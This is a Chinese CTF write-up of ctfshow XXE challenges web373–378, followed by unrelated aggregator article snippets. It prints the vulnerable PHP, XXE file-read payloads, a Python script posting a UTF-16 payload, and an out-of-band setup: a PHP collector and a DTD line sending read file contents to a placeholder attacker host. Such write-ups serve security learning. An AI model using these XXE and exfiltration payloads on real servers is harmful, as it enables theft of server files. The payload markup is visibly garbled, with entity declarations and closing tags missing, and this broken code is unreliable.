H3rmesk1t

ctfshow web入门-XXE

ctfshow web入门-XXE

web373
- 题目描述
- 解题思路
web374
- 题目描述
- 解题思路
web375
- 题目描述
- 解题思路
web376
- 题目描述
- 解题思路
web377
- 题目描述
- 解题思路
web378
- 题目描述
- 解题思路

web373

题目描述

开X

解题思路

题目给出源码，一个有回显的文件读取漏洞


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
?>

抓包发送如下内容


DOCTYPE xml [

]>
<H3rmesk1t>
	<ctfshow>
		&xxe;
	ctfshow>
H3rmesk1t>

web374

题目描述

开X

解题思路

无回显的文件读取，需要进行外带


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__); 
?>

抓包发送如下内容

DOCTYPE ANY[


%remote;
%send;
]>

在服务器放置 xxe.php 和 xxe.xml 两个文件


$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web375

题目描述

开X

解题思路

无回显的文件读取，且禁用了版本号，和上面一样进行外带不写版本号即可


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>

抓包发送如下内容

DOCTYPE ANY[


%remote;
%send;
]>

在服务器放置 xxe.php 和 xxe.xml 两个文件


$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web376

题目描述

开X

解题思路

无回显的文件读取，且禁用了版本号，和上面一样进行外带不写版本号即可


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>

抓包发送如下内容

DOCTYPE ANY[


%remote;
%send;
]>

在服务器放置 xxe.php 和 xxe.xml 两个文件


$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web377

题目描述

开X

解题思路

无回显的文件读取，且禁用了版本号和http，和上面一样进行外带不写版本号改成利用 utf-16 编码即可


error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    
?>

利用 Python 进行发包

import requests
url = 'http://00edd7b9-7fc6-40fd-937d-deb477902dca.challenge.ctf.show:8080/'
payload = '''


%remote;
%send;
]>
'''
payload = payload.encode('utf-16')
rep = requests.post(url=url, data=payload)
print(rep.text)

在服务器放置 xxe.php 和 xxe.xml 两个文件


$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

% send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web378

题目描述

python X

解题思路

登录框抓个包，发现是回显 xml 形式，而且是回显 username 的值，构造 Payload


DOCTYPE ANY [

]>
<user><username>&file;username><password>apassword>user>

你可能感兴趣的:(#,ctfshow-web,XML,XXE外部实体注入,ctfshow,WEB安全)

使用 Nginx 搭建代理服务器（正向代理 HTTPS 网站）指南 web13688565871 nginx https 运维
在网络应用中，代理服务器是用于中转用户请求和服务端响应的工具。正向代理主要用于客户端与外部服务器之间的访问代理，帮助客户端隐藏其IP地址或访问受限资源。本文将详细介绍如何使用Nginx搭建正向代理服务器，特别是针对HTTPS网站的代理。一、正向代理与反向代理的区别1.1正向代理正向代理位于客户端和服务器之间，代表客户端向服务器发起请求。其主要功能是隐藏客户端信息，代理客户端进行网络访问，尤其是访问
【Spring Boot】Spring Boot解决循环依赖 m0_54851477 面试学习路线阿里巴巴 spring boot java spring
目录循环依赖一、前言二、Bean的创建过程三、循环依赖检测机制3.1实例化阶段3.2属性填充阶段3.3依赖注入循环依赖一、前言环依赖是指两个或者多个bean互相依赖对方，从而形成一个闭环。例如：BeanA依赖于BeanB，而BeanB又依赖于BeanA。可能会导致Spring在尝试创建这些bean实例时出现问题，因为他们互相等待对方被创建，最终导致应用程序无法启动。Spring是如何发现这种循环依
领域驱动设计（DDD）是什么？——从理论到实践的全方位解析小胡说技书 Java+SSM+DB java 领域驱动设计（DDD）架构领域模型微服务
文章目录一、引言二、核心概念与定位2.1DDD定义与核心理念2.2DDD关键元素三、底层原理与技术细节3.1领域模型与普适语言3.1.1领域模型3.1.2普适语言（UbiquitousLanguage）3.2战术设计模式详解3.2.1实体、值对象、聚合与领域服务3.2.2无状态函数在领域服务中的应用3.2.3工厂与仓储模式3.3战略设计：限界上下文与防腐层3.3.1限界上下文（BoundedCon
当 Deepseek 频繁提示 “服务器繁忙“，我们该如何破局？晚风る AI人工智能网络
在使用Deepseek的过程中，不少用户都遭遇过“服务器繁忙”的提示，这无疑给我们的使用体验带来了极大的困扰。那么，当这种情况频繁出现时，我们究竟该如何应对呢？本文将为大家提供一些有效的解决方案。一、原因分析DeepSeek服务器繁忙的原因可能有以下几点：用户流量过大：如用户量激增，高峰时段访问。技术性能瓶颈：如算力瓶颈、带宽限制、模型优化不足。安全问题：如外部恶意攻击。服务维护与限制：如服务维护
Redisson自定义序列化兔子先生° java
主要是解决LocalDateTime的序列化报错问题。com.fasterxml.jackson.databind.exc.InvalidDefinitionException:Java8date/timetype`java.time.LocalDateTime`notsupportedbydefault:addModule"com.fasterxml.jackson.datatype:jacks
别再懵圈了！Spring IOC/DI，看完不懂你喷我！码熔burning SpringBoot spring java 后端
文章目录一、什么是IOC（控制反转）？二、什么是DI(依赖注入）？三、为什么要有IOC和DI？四、IOC和DI的好处五、应用实例六、总结一、什么是IOC（控制反转）？传统方式：想象一下，你要盖房子。传统方式是你自己找砖头、水泥、钢筋，自己搅拌水泥，自己一块一块地砌砖。所有的事情都由你来控制。IOC方式：现在有了IOC，你只需要告诉一个建筑公司（IOC容器）：“我要盖房子，需要这些材料和工人。”建筑
WEB漏洞-XXE&XML之利用检测绕过网小白白 xml java php web 网络安全
XXE"xmlexternalentityinjection"-XML外部实体注入漏洞服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入xml基本语法XML被设计用来结构化、存储以及传输信息;恰恰相反,HTML是被设计用来显示数据，其焦点是数据的外观。XML没有预定义的标签。它仅仅是纯文本而已。有能力处理纯文本的软件都可以处理XML。XML不会做任何事情
Spring框架篇 yadanuof yy的学习之路 spring java 数据库
Bean线程单例bean不是线程安全的,Spring框架中有一个@Scope注解，默认的值就是singleton，单例的。因为一般在spring的bean的中都是注入无状态的对象，没有线程安全问题，如果在bean中定义了可修改的成员变量，是要考虑线程安全问题的，可以使用多例或者加锁来解决AOPAOP面向切面编程,用于处理那些与业务无关,但对多个对象产生影响的公共行为和逻辑,将其抽取并封装为一个可重
C#实现实体类与字符串互相转换的方法 xinyuerr C语言 java c#java 算法
这篇文章主要介绍了C#实现实体类与字符串互相转换的方法,涉及C#字符串及对象的相互转换技巧,具有一定参考借鉴价值,需要的朋友可以参考下本文实例讲述了C#实现实体类与字符串互相转换的方法。分享给大家供大家参考。具体实现方法如下：123456789101112131415161718192021222324252627282930313233343536373839404142434445464748
SSM框架搭建皇家大厨笔记
此文参考书籍为ACCP软件工程师——使用SSM框架开发企业级应用8.0版文章目录遇到的问题：1.错误：couldnotfindresourcesrc/dao/UserMapper.xml和mybatis启动异常：Logginginitializedusing'classorg.apache.ibatis.logging.log4j.Log4jImpl'2.Eclipse中的路径问题：3.log4j
第九天：数据提取-XPath 朱剑君 Python爬虫训练营 python 开发语言爬虫
文章目录一、介绍二、安装1.节点的关系2.选取节点1）常用的路径表达式2）通配符3）选取若干路径4）谓语5）XPath运算符三、使用1.小例子2.XPath具体使用一、介绍之前BeautifulSoup的用法，这个已经是非常强大的库了，不过还有一些比较流行的解析库，例如lxml，使用的是Xpath语法，同样是效率比较高的解析方法。如果大家对BeautifulSoup使用不太习惯的话，可以尝试下Xp
文心一言，免费使用悟空码字 AI 百度 AI 百度文心一言
大家好，我是小悟。百度官方公众号发布消息，文心一言宣布自4月1日起全面免费开放，PC端和APP端用户均可体验其最新模型。随着文心大模型的迭代升级和成本不断下降，文心一言将于4月1日零时起，全面免费，所有PC端和APP端用户均可体验文心系列最新模型。与此同时，文心一言上线深度搜索功能。该功能也将于4月1日起免费开放使用。深度搜索功能，具备更强大的思考规划和使用外部工具能力，可为用户提供专家级内容回复
Qt学习1 qq_43361844 QT qt 学习开发语言
QUuidQUuid是Qt库中的一个类，用于生成、表示和操作UUID（通用唯一标识符，UniversallyUniqueIdentifier）。UUID是一种广泛使用的标识符，通常用来唯一地标识对象、记录、会话、文件、实体等。QUuid类简介QUuid类提供了一个简单的接口，用于创建、解析和操作UUID。UUID在很多应用场景中都有广泛使用，比如在数据库中作为主键、在分布式系统中唯一标识设备和实体
Hutool-------值得推荐的java工具库丶Apache Java
网址：https://www.hutool.cn/docs/#/安装Maven在项目的pom.xml的dependencies中加入以下内容:cn.hutoolhutool-all5.3.7Gradlecompile'cn.hutool:hutool-all:5.3.7'包含组件一个Java基础工具类，对文件、流、加密解密、转码、正则、线程、XML等JDK方法进行封装，组成各种Util工具类，同时
Java Swing-2.环境搭建及窗口背景 crime_lamb java swing java 开发语言
环境搭建及设置窗口背景环境搭建jdk：1.8Maven：3.2.5开发一个小型的桌面程序，可直接创建一个基础的Maven项目，我的场景中不使用Spring所以并没有使用Springboot框架下面是我的pom.xml4.0.0org.exampleSwing-Test1.0-SNAPSHOTArchetype-Swing-Testhttp://maven.apache.orgcom.formdev
IDEA项目能正常启动但是get/set 方法都是爆红 TFHoney intellij-idea java
问题背景：项目中也引入了lombok的依赖,@Data注解也标注在实体类上了,但所有的get和set方法爆红,项目也可以正常启动问题原因：没有安装lombok插件问题解决：只需在idea上:file—>settings—>plugins---->搜索lombok的插件，install安装即可或者去官网下载，选择链接附上（Lombok-IntelliJIDEsPlugin|Marketplace）,
java springboot连接sqlserver使用大得369 java spring boot sqlserver
pom.xml增加sqlserver驱动com.microsoft.sqlservermssql-jdbc9.4.0.jre8application.yml配置文件server:port:9001#spring:#application:#name:dade01#datasource:#driver-class-name:com.mysql.jdbc.Driver#url:jdbc:mysql:/
(PCB)如何选中PCB中keep-out layer外框颖风船
工作中画PCB，更换CPU。但外部尺寸是一定的，这时候需要拷贝之前老的方案的PCB外框。切到keep-outlayer层，选中外框的一条线，然后按住tab，就能选中PCB的整个外框，之后ctrl+c，ctrl+v就能完整的复制出来了。
Java整合GPT-3.5和GPT-4，让PPT制作变得更加轻松智能化 GPTCoder ChatGPT java 人工智能 gpt-3 自然语言处理 chatgpt
在当今的商业环境中，PPT演示文稿已成为一种重要的沟通工具。然而，创建高质量的PPT往往耗时且繁琐。基于这个痛点，本文将介绍如何使用Java整合GPT-3.5/4，根据PPT模板自动生成完整的PPT。我们将使用ApachePOI库操作来PPT文件，同时调用GPT-3.5/4API生成内容。首先，我们需要导入ApachePOI库。在Maven项目中，将以下依赖添加到pom.xml文件中：org.ap
大学信息安全技术期末考试复习题网络安全Max 网络
一、单选题（一）1、在以下人为的恶意攻击行为中，属于主动攻击的是（）AA．数据篡改及破坏B．数据窃听C．数据流分析D．非法访问2、数据完整性指的是（）CA．保护网络中各系统之间交换的数据，防止因数据被截获而造成泄密B．提供连接实体身份的鉴别C．防止非法实体对用户的主动攻击，保证数据接受方收到的信息与发送方发送的信息完全一致D．确保数据数据是由合法实体发出的3、CA指的是：（）AA．证书授权B．加密
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp 2401_84281698 程序员网络安全学习面试
给大家的福利零基础入门对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供：因篇幅有限，仅展示部分资料网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。需要这份系统化资料的朋友，可以点击这里获取一个人可以走的很
Java面试宝典（Spring篇） y_Haveme Spring 面试题开发语言 java spring
目录1.什么是spring？2.Spring框架的优点。3.什么是IOC（控制反转）？4.依赖注入的方式。5.Autowired和Resource关键字的区别？6.什么是AOP（面向切面编程）？7.什么是通知呢？有哪些类型呢？8.springbean的生命周期。9.Spring支持的几种bean的作用域。10.Spring框架中都用到了哪些设计模式？11.事务三要素是什么？12.Spring事务实
GO语言中的结构体struct 敖光 SRE go基础知识 golang 开发语言后端
结构体结构体是由一系列具有相同类型或不同类型的数据构成的数据集合。结构体是由0个或多个任意类型的值聚合成的实体，每个值都可以被称为结构体的成员。特性结构体的成员也可以被称为"字段"，具有以下特性：字段拥有自己的类型和值。字段名必须唯一。字段的类型也可以是结构体；甚至是字段所在结构体的类型的指针类型。字段的首字母决定其可访问性。自定义类型packagemainimport"fmt"typet1int
python读取docx文件_Python读写docx文件 weixin_39710106 python读取docx文件
Python读写word文档有现成的库可以处理。我这里采用python-docx。可以用pipinstallpython-docx安装一下。这里说一句，ppt和excel也有类似的库哦，而且是直接读取文件里面的xml数据。所以doc格式得另找其他库处理，doc格式不是基于xml的。1、新建或打开文件。这个比较简单用docx的Document类，若指定路径则是打开文档；若没有指定路径则是新建文档#c
边界扫描测试（Boundary Scan Test）优缺点 JTAG测试白头翁测试工具测试覆盖率硬件工程嵌入式硬件
边界扫描测试（BoundaryScanTest）定义：主要基于IEEE1149.1和1149.6标准（JTAG），通过芯片内置的扫描链访问和控制引脚状态，主要用于检测硬件连接的物理缺陷。优点：物理缺陷检测高效检测焊接问题、开路/短路、元器件缺失等制造缺陷。高覆盖率可覆盖传统测试难以触及的节点（如高密度BGA封装引脚）。无需物理探针通过JTAG接口即可访问内部节点，无需外部测试设备。自动化程度高支持
网络安全---SQL注入攻击犹若故人归网络数据库 postgresql web安全 docker 安全 sql
一、实验目的SQL注入是一种代码注入技术，可利用Web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在Web应用程序中正确检查时，该漏洞就存在。许多Web应用程序从用户处获取输入，然后使用这些输入构建SQL查询，以便从数据库获取信息。Web应用程序还使用SQL查询将信息存储在数据库中。这些都是开发Web应用程序的常见做法。当SQL查询没有仔细构建时，可能会出现S
Electron视图进程和主进程通讯陆康永 electron electron javascript 前端
快速创建基于vue的electron项目：@quick-start/create-electron-npm视图线程也就index.html是无法直接访问这个api的（如果没有开启视图层访问nodejs的功能，现在几乎没法直接开启，开启了一堆警告提示）所以需要通过reload.js方式给index.html视图层注入对应的方法，挂在window对象下面视图层给后端发起消息如果希望通过then的方式获
疯狂前端面试题(四) 吃蛋糕的居居前端 html5 ajax 正则表达式 javascript firefox chrome
一、Ajax、JSONP、JSON、Fetch和Axios技术详解1.Ajax（异步JavaScript和XML）什么是Ajax？Ajax是一种用于在不刷新页面的情况下与服务器进行数据交互的技术。它通过`XMLHttpRequest`对象实现。优点-支持同步和异步请求。-能够发送和接收多种格式的数据（如JSON、XML等）。缺点-原生代码较复杂。-不支持跨域请求（需要服务器配置CORS或使用JSO
minio Non-XML response from server xgjj68163 问题解决 xml
1.使用docker安装minio详见(3条消息)docker安装minio_西瓜-CSDN博客2.出错此错误原因2.1.启动镜像参数--console-address":9000"-address":9001"，其中--console-address指的是控制台页面端口，-address指的是api调用接口2.2错误原因为程序配置的api接口地址中端口为9000，应该配置为9001参考：(3条消
Java版PDF拼接未秃也可程序员 java pdf python
首先确保pom.xml文件中是否存在对应配置信息org.apache.pdfboxpdfbox2.0.27代码部分直接复制下方代码importorg.apache.pdfbox.multipdf.PDFMergerUtility;importjava.io.File;importjava.io.IOException;importjava.util.ArrayList;importjava.uti
LeetCode[Math] - #66 Plus One Cwind java LeetCode 题解 Algorithm Math
原题链接：#66 Plus One 要求：给定一个用数字数组表示的非负整数，如num1 = {1, 2, 3, 9}, num2 = {9, 9}等，给这个数加上1。注意： 1. 数字的较高位存在数组的头上，即num1表示数字1239 2. 每一位（数组中的每个元素）的取值范围为0~9 难度：简单分析：题目比较简单，只须从数组
JQuery中$.ajax()方法参数详解 AILIKES JavaScript jsonp jquery Ajax json
url: 要求为String类型的参数，（默认为当前页地址）发送请求的地址。 type: 要求为String类型的参数，请求方式（post或get）默认为get。注意其他http请求方法，例如put和 delete也可以使用，但仅部分浏览器支持。 timeout: 要求为Number类型的参数，设置请求超时时间（毫秒）。此设置将覆盖$.ajaxSetup()方法的全局
JConsole & JVisualVM远程监视Webphere服务器JVM Kai_Ge JVisualVM JConsole Webphere
JConsole是JDK里自带的一个工具，可以监测Java程序运行时所有对象的申请、释放等动作，将内存管理的所有信息进行统计、分析、可视化。我们可以根据这些信息判断程序是否有内存泄漏问题。　　使用JConsole工具来分析WAS的JVM问题，需要进行相关的配置。　　首先我们看WAS服务器端的配置. 　　1、登录was控制台https://10.4.119.18
自定义annotation 120153216 annotation
Java annotation 自定义注释@interface的用法一、什么是注释说起注释，得先提一提什么是元数据(metadata)。所谓元数据就是数据的数据。也就是说，元数据是描述数据的。就象数据表中的字段一样，每个字段描述了这个字段下的数据的含义。而J2SE5.0中提供的注释就是java源代码的元数据，也就是说注释是描述java源
CentOS 5/6.X 使用 EPEL YUM源 2002wmj centos
CentOS 6.X 安装使用EPEL YUM源1. 查看操作系统版本[root@node1 ~]# uname -a Linux node1.test.com 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux [root@node1 ~]#
在SQLSERVER中查找缺失和无用的索引SQL 357029540 SQL Server
--缺失的索引 SELECT avg_total_user_cost * avg_user_impact * ( user_scans + user_seeks ) AS PossibleImprovement , last_user_seek ,
Spring3 MVC 笔记（二） —json+rest优化 7454103 Spring3 MVC
接上次的 spring mvc 注解的一些详细信息！其实也是一些个人的学习笔记呵呵！
替换“\”的时候报错Unexpected internal error near index 1 \ ^ adminjun java “\替换”
发现还是有些东西没有刻子脑子里,,过段时间就没什么概念了,所以贴出来...以免再忘... 在拆分字符串时遇到通过 \ 来拆分，可是用所以想通过转义 \\ 来拆分的时候会报异常 public class Main { /*
POJ 1035 Spell checker(哈希表) aijuans 暴力求解--哈希表
/* 题意：输入字典，然后输入单词，判断字典中是否出现过该单词，或者是否进行删除、添加、替换操作，如果是，则输出对应的字典中的单词要求按照输入时候的排名输出题解：建立两个哈希表。一个存储字典和输入字典中单词的排名，一个进行最后输出的判重 */ #include <iostream> //#define using namespace std; const int HASH =
通过原型实现javascript Array的去重、最大值和最小值 ayaoxinchao JavaScript array prototype
用原型函数（prototype）可以定义一些很方便的自定义函数，实现各种自定义功能。本次主要是实现了Array的去重、获取最大值和最小值。实现代码如下： <script type="text/javascript"> Array.prototype.unique = function() { var a = {}; var le
UIWebView实现https双向认证请求 bewithme UIWebView https Objective-C
什么是HTTPS双向认证我已在先前的博文 ASIHTTPRequest实现https双向认证请求中有讲述，不理解的读者可以先复习一下。本文是用UIWebView来实现对需要客户端证书验证的服务请求，网上有些文章中有涉及到此内容，但都只言片语，没有讲完全，更没有完整的代码，让人困扰不已。但是此知
NoSQL数据库之Redis数据库管理(Redis高级应用之事务处理、持久化操作、pub_sub、虚拟内存) bijian1013 redis 数据库 NoSQL
3.事务处理 Redis对事务的支持目前不比较简单。Redis只能保证一个client发起的事务中的命令可以连续的执行，而中间不会插入其他client的命令。当一个client在一个连接中发出multi命令时，这个连接会进入一个事务上下文，该连接后续的命令不会立即执行，而是先放到一个队列中，当执行exec命令时，redis会顺序的执行队列中
各数据库分页sql备忘 bingyingao oracle sql 分页
ORACLE 下面这个效率很低 SELECT * FROM ( SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_FS_RETURN order by id desc) A ) WHERE RN <20; 下面这个效率很高 SELECT A.*, ROWNUM RN FROM (SELECT * FROM IPAY_RCD_
【Scala七】Scala核心一：函数 bit1129 scala
1. 如果函数体只有一行代码，则可以不用写{},比如 def print(x: Int) = println(x) 一行上的多条语句用分号隔开，则只有第一句属于方法体，例如 def printWithValue(x: Int) : String= println(x); "ABC" 上面的代码报错，因为，printWithValue的方法
了解GHC的factorial编译过程 bookjovi haskell
GHC相对其他主流语言的编译器或解释器还是比较复杂的，一部分原因是haskell本身的设计就不易于实现compiler，如lazy特性，static typed，类型推导等。关于GHC的内部实现有篇文章说的挺好，这里，文中在RTS一节中详细说了haskell的concurrent实现，里面提到了green thread，如果熟悉Go语言的话就会发现，ghc的concurrent实现和Go有点类
Java-Collections Framework学习与总结-LinkedHashMap BrokenDreams LinkedHashMap
前面总结了java.util.HashMap，了解了其内部由散列表实现，每个桶内是一个单向链表。那有没有双向链表的实现呢？双向链表的实现会具备什么特性呢？来看一下HashMap的一个子类——java.util.LinkedHashMap。
读《研磨设计模式》-代码笔记-抽象工厂模式-Abstract Factory bylijinnan abstract
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ package design.pattern; /* * Abstract Factory Pattern * 抽象工厂模式的目的是： * 通过在抽象工厂里面定义一组产品接口，方便地切换“产品簇” * 这些接口是相关或者相依赖的
压暗面部高光 cherishLC PS
方法一、压暗高光&重新着色当皮肤很油又使用闪光灯时，很容易在面部形成高光区域。下面讲一下我今天处理高光区域的心得：皮肤可以分为纹理和色彩两个属性。其中纹理主要由亮度通道（Lab模式的L通道）决定，色彩则由a、b通道确定。处理思路为在保持高光区域纹理的情况下，对高光区域着色。具体步骤为：降低高光区域的整体的亮度，再进行着色。如果想简化步骤，可以只进行着色（参看下面的步骤1
Java VisualVM监控远程JVM crabdave visualvm
Java VisualVM监控远程JVM JDK1.6开始自带的VisualVM就是不错的监控工具. 这个工具就在JAVA_HOME\bin\目录下的jvisualvm.exe, 双击这个文件就能看到界面通过JMX连接远程机器, 需要经过下面的配置: 1. 修改远程机器JDK配置文件 (我这里远程机器是linux).
Saiku去掉登录模块 daizj saiku 登录 olap BI
1、修改applicationContext-saiku-webapp.xml <security:intercept-url pattern="/rest/**" access="IS_AUTHENTICATED_ANONYMOUSLY" /> <security:intercept-url pattern=&qu
浅析 Flex中的Focus dsjt html Flex Flash
关键字：focus、 setFocus、 IFocusManager、KeyboardEvent 焦点、设置焦点、获得焦点、键盘事件一、无焦点的困扰——组件监听不到键盘事件原因：只有获得焦点的组件（确切说是InteractiveObject）才能监听到键盘事件的目标阶段；键盘事件（flash.events.KeyboardEvent）参与冒泡阶段，所以焦点组件的父项（以及它爸
Yii全局函数使用 dcj3sjt126com yii
由于YII致力于完美的整合第三方库，它并没有定义任何全局函数。yii中的每一个应用都需要全类别和对象范围。例如，Yii::app()->user;Yii::app()->params['name'];等等。我们可以自行设定全局函数，使得代码看起来更加简洁易用。(原文地址) 我们可以保存在globals.php在protected目录下。然后，在入口脚本index.php的，我们包括在
设计模式之单例模式二（解决无序写入的问题） come_for_dream 单例模式 volatile 乱序执行双重检验锁
在上篇文章中我们使用了双重检验锁的方式避免懒汉式单例模式下由于多线程造成的实例被多次创建的问题，但是因为由于JVM为了使得处理器内部的运算单元能充分利用，处理器可能会对输入代码进行乱序执行（Out Of Order Execute）优化，处理器会在计算之后将乱序执行的结果进行重组，保证该
程序员从初级到高级的蜕变 gcq511120594 框架工作 PHP android html5
软件开发是一个奇怪的行业，市场远远供不应求。这是一个已经存在多年的问题，而且随着时间的流逝，愈演愈烈。我们严重缺乏能够满足需求的人才。这个行业相当年轻。大多数软件项目是失败的。几乎所有的项目都会超出预算。我们解决问题的最佳指导方针可以归结为——“用一些通用方法去解决问题，当然这些方法常常不管用，于是，唯一能做的就是不断地尝试，逐个看看是否奏效”。现在我们把淫浸代码时间超过3年的开发人员称为
Reverse Linked List hcx2013 list
Reverse a singly linked list. /** * Definition for singly-linked list. * public class ListNode { * int val; * ListNode next; * ListNode(int x) { val = x; } * } */ p
Spring4.1新特性——数据库集成测试 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
C# Ajax上传图片同时生成微缩图(附Demo) liyonghui160com
1.Ajax无刷新上传图片,详情请阅我的这篇文章。（jquery + c# ashx） 2.C#位图处理 System.Drawing。 3.最新demo支持IE7,IE8,Fir
Java list三种遍历方法性能比较 pda158 java
从c/c++语言转向java开发，学习java语言list遍历的三种方法，顺便测试各种遍历方法的性能，测试方法为在ArrayList中插入1千万条记录，然后遍历ArrayList，发现了一个奇怪的现象，测试代码例如以下： package com.hisense.tiger.list; import java.util.ArrayList; import java.util.Iterator;
300个涵盖IT各方面的免费资源（上）——商业与市场篇 shoothao seo 商业与市场 IT资源免费资源
A.网站模板+logo+服务器主机+发票生成 HTML5 UP:响应式的HTML5和CSS3网站模板。 Bootswatch:免费的Bootstrap主题。 Templated:收集了845个免费的CSS和HTML5网站模板。 Wordpress.org|Wordpress.com:可免费创建你的新网站。 Strikingly:关注领域中免费无限的移动优
localStorage、sessionStorage uule localStorage
W3School 例子 HTML5 提供了两种在客户端存储数据的新方法： localStorage - 没有时间限制的数据存储 sessionStorage - 针对一个 session 的数据存储之前，这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储，因为它们由每个对服务器的请求来传递，这使得 cookie 速度很慢而且效率也不

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他